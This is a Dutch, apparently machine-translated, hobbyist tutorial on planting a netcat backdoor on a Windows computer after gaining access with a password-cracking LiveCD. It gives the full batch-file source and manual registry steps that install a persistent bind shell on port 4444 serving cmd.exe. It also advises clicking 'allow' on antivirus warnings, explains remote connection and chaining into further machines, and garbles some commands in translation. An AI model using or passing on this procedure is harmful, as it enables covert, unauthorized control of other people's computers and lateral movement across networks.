Netcat Fun!: 5 stappen

2024 Auteur: John Day | [email protected]. Laatst gewijzigd: 2024-01-30 11:19

Deze instructable laat je zien hoe je een achterdeur kunt maken op een computer met netcat! Ik zal je twee manieren laten zien om dit te doen, met en zonder mijn batchbestand dat het voor je automatiseert. Deze instructable gaat er al van uit dat je al root-rechten op de computer hebt, waarschijnlijk met een 0phcrack LiveCD hier. Nu, op de instructable.

Stap 1: Download Netcat

Ik heb je de moeite van 3 minuten zoeken op Google bespaard en heb nc.exe op instructables gezet die je kunt downloaden. Optioneel kunt u ook nc.bat downloaden, een batchbestand dat ik heb gemaakt om het proces voor u te automatiseren. Zorg ervoor dat als je nc.bat downloadt, het 464 bytes is, want ik bleef versies uploaden en ontdekte dat er iets mis mee was. Als het niet 464 bytes is, komt het programma niet overeen met dit instructable.

Stap 2: Met Nc.bat

Ten eerste moeten beide bestanden zich in dezelfde map bevinden om nc.bat correct te laten werken. Ik raad aan om voor deze bewerking een flashstation of cd-rom te gebruiken. Ik heb hiervoor een geek squadron-flashdrive van 512 mb gebruikt, maar dat ben ik alleen. Kopieer de bestanden dus naar uw externe media-apparaat en breng ze naar de computer waarop u root hebt. Ga naar het media-apparaat en dubbelklik op nc.bat. Dit kopieert het nc.exe-bestand naar de map system32, in de systeemhoofdmap (meestal C:\Windows of C:\WINNT) en brengt de nodige wijzigingen aan in het register. Schrijf vervolgens het IP-adres op. Het zal zoiets zijn als '192.168.1.103', wat van mij is. Zodra dit is gebeurd, start u de machine opnieuw op en logt u in. Dan kan het antivirusprogramma u vragen of u het programma wilt toestaan/niet toestaan. Klik op 'Toestaan' of iets dergelijks. Houd er rekening mee dat u in deze instructie alleen kunt telnetten vanaf het lokale netwerk van die computer. Ga dan weg, of log uit, of wat je maar wilt.

Stap 3: Zonder Nc.bat

Om dit te doen, moet u nc.exe op een cd of flashstation hebben. Ga naar de computer, log in en sluit de flashdrive aan of plaats uw cd. Vanaf hier zijn er twee manieren: de opgepoetste grafische gebruikersinterface van Windows, of de vuile, ouderwetse manier van de opdrachtprompt. De vuile, ouderwetse manier van de opdrachtprompt: trek de opdrachtprompt omhoog door naar StartRun te gaan en typ in:

cmd.exeNavigeer naar de flash of je cd-station. Als u niet weet welke schijf dat is, klikt u met de rechtermuisknop op de startknop en klikt u op verkennen. Klik op alle niet-lokale stations in Deze computer totdat u bij uw flash/cd-station komt. Onthoud de letter van de schijf en ga terug naar de opdrachtprompt. Typ de letter van het station gevolgd door een dubbele punt, zoals dit: K: Typ vervolgens één regel tegelijk, gevolgd door op de Return-toets te drukken

kopieer nc.exe %systemroot%\system32\nc.exereg voeg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc.exe -L -d -p 4444 - toe t -e cmd.exe"Dat was zo'n beetje de installatie. Het enige dat u nu hoeft te weten, is het lokale IP-adres, dat u gemakkelijk kunt vinden door het 'ipconfig'-commando in te typen en iets in de tabel te zoeken, zoals "192.168.1.103". Start vervolgens de machine opnieuw op en meld u opnieuw aan. Het antivirusprogramma kan u vragen of u dit wilt toestaan/niet toestaan. Klik op toestaan. Dan ben je vrij om met de computer te doen wat je wilt. De opgepoetste grafische interfaces van WindowsKlik met de rechtermuisknop op de startknop en klik op verkennen. Klik op alle niet-lokale stations in Deze computer totdat u bij uw flash/cd-station komt. Klik vervolgens met de rechtermuisknop op nc.exe en kopieer. Ga vervolgens naar de C-schijf en klik op de map Windows of WINNT. Ga vervolgens naar de map system32 en plak nc.exe. Sluit dat af en ga naar StartRun. Typ regedit. Navigeer door de mappen naar: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunKlik vervolgens met de rechtermuisknop op een lege ruimte en ga naar NewString Value. Typ wat je wilt voor de naam, maar typ voor de waarde in

%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exeDat was zo'n beetje de installatie. Het enige dat u nu hoeft te weten, is het lokale IP-adres, dat u gemakkelijk kunt vinden door de opdracht 'ipconfig' in de opdrachtprompt (StartRun:cmd.exe) te typen en iets in de tabel te zoeken zoals "192.168.1.103". Start vervolgens de machine opnieuw op en meld u opnieuw aan. Het antivirusprogramma kan u vragen of u dit wilt toestaan/niet toestaan. Klik op toestaan. Dan ben je vrij om met de computer te doen wat je wilt.

Stap 4: Terug naar binnen gaan

Zodra je het hebt geïnstalleerd en je de host wilt overnemen, open je de opdrachtprompt of PuTTY. Ik vind PuTTY geweldig, dus ik zal je het hier laten downloaden. Gebruik PuTTYDownload en open PuTTY.exe. Klik op het 'ruwe' protocol. Typ in het tekstvak poort # 4444. Typ in het vak 'hostadres' het IP-adres dat je tijdens de installatie hebt genoteerd. Druk dan op enter. PuTTY moet verbinding maken met de box en je krijgt een opdrachtprompt. Opdrachtprompt gebruikenOpen de opdrachtprompt en typ 'telnet 4444'. Druk vervolgens op enter en je zou een opdrachtprompt moeten krijgen. Hiermee kunt u bijna alles wat u wilt op de computer op afstand doen wat u kunt doen met een lokaal account. Het begint pas echt interessant te worden als je de ene computer ingaat, en dan vanaf die computer in een andere computer, om een hele reeks computers met elkaar te verbinden. Veel (juridisch) plezier!

Stap 5: Broncode

Omdat ik ben gevraagd, zal ik de broncode (voor het batchbestand) plaatsen en elke opdracht uitleggen en wat het doet. Pas op! Dit is de huidige versie van het batchinstallatieprogramma. Als de jouwe anders is, zal de code verschillen.

@echo offcopy nc.exe %systemroot%\system32\nc.exeif errorlevel 0 goto regeditgoto error:regeditreg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc. exe -L -d -p 4444 -t -e cmd.exe"if errorlevel 0 goto ip:errorecho er is iets onverwachts opgetreden en het programma moet afsluiten.goto end:ipecho noteer het IP-adres van tableipconfig:endecho end.echo ducttape uit.pauze@echo off-Vertelt dat het de commando's niet moet tonen bij het uitvoeren.copy nc.exe %systemroot%\system32\nc.exe-meestal kopieert netcat naar C:\WINDOWS\system32. Dit zorgt ervoor dat wanneer je weer naar binnen gaat, in plaats van steeds van directory te veranderen, je gewoon "nc" kunt typen om een andere poort te openen.if errorlevel 0 goto regedit-error checking. Als de kopie succesvol was, gaat het verder met het bewerken van de registry.goto error-Als er een fout is opgetreden, ga dan naar het:error label.:regedit-A label, specificeer dat wanneer het programma zegt "goto regedit", om hier te gaan.reg voeg HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exe"-(verondersteld be one line) die de registersleutel toevoegt om het programma opnieuw te starten wanneer het opnieuw wordt opgestart. /f betekent bestaande sleutel overschrijven, /v voor sleutelnaam, /d voor gegevens. De rest van de tags worden ingevoerd voor netcat. -L zegt om het opnieuw op te starten bij afsluiten, zodat u niet hoeft te wachten tot de computer opnieuw is opgestart. -d ik ben het vergeten. -p 4444 specificeert poort #. - ik ben het vergeten. -e cmd.exe zorgt ervoor dat de opdrachtprompt start op remote connection.if errorlevel 0 ga naar ip-foutcontrole. Als de run verkeerd ging, zou het deze regel overslaan en naar het:error-label gaan.echo er is iets onverwachts gebeurd en het programma moet afsluiten.-vertelt het programma om af te drukken "er is iets onverwachts gebeurd en het programma moet afsluiten " op de screen.goto end-if het ging naar de foutmelding, er is iets misgegaan en het programma moet toch sluiten.:ip-Nogmaals, label.echo noteer het IP-adres uit de tabel-Schrijft "schrijf het IP-adres op adres van de tabel" naar de screen.ipconfig-Dit is een opdracht die informatie afdrukt over uw LAN-instellingen (Local Area Network).:end-Label.echo end.-schrijft "end" naar de screen.echo ducttape out. -schrijft "duct tape out" naar het scherm.pauze - deze opdracht pauzeert het programma en wacht tot de gebruiker op een toets drukt. In dit programma wacht het op invoer en sluit het programma vervolgens af.